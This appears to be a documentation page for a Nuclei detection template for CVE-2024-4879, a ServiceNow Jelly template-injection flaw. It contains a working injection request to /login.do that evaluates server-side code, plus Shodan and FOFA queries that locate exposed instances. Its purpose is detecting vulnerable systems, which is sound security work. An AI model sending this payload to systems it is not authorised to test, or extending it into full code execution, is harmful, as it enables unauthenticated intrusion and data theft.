ServiceNow UI Macros - Template Injection
ID: CVE-2024-4879
Severity: critical
Author: DhiyaneshDk,ritikchaddha
Tags: cve,cve2024,servicenow,ssti,kev
Description
Section titled “Description”ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.
YAML Source
Section titled “YAML Source”id: CVE-2024-4879
info: name: ServiceNow UI Macros - Template Injection author: DhiyaneshDk,ritikchaddha severity: critical description: | ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible. reference: - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293 - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1645154 - https://nvd.nist.gov/vuln/detail/CVE-2024-4879 metadata: verified: true max-request: 1 vendor: servicenow product: servicenow shodan-query: - http.favicon.hash:"1701804003" - http.title:"servicenow" fofa-query: - icon_hash=1701804003 - title="servicenow" google-query: intitle:"servicenow" tags: cve,cve2024,servicenow,ssti,kev
http: - raw: - | GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j="jelly"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(1337*1337);</g:evaluate></j:jelly></style> HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - '<div class="outputmsg_text">1787569</div>'
- type: word part: header words: - 'text/html'
- type: status status: - 200# digest: 490a0046304402207525e805213217bff57294169fb53157e63e7721d759155f419565e4ce18a0d002200a53da5e014b35f99ce8e92872776d1527221935240ea62fc2fc61f7ba14db8a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-4879.yaml"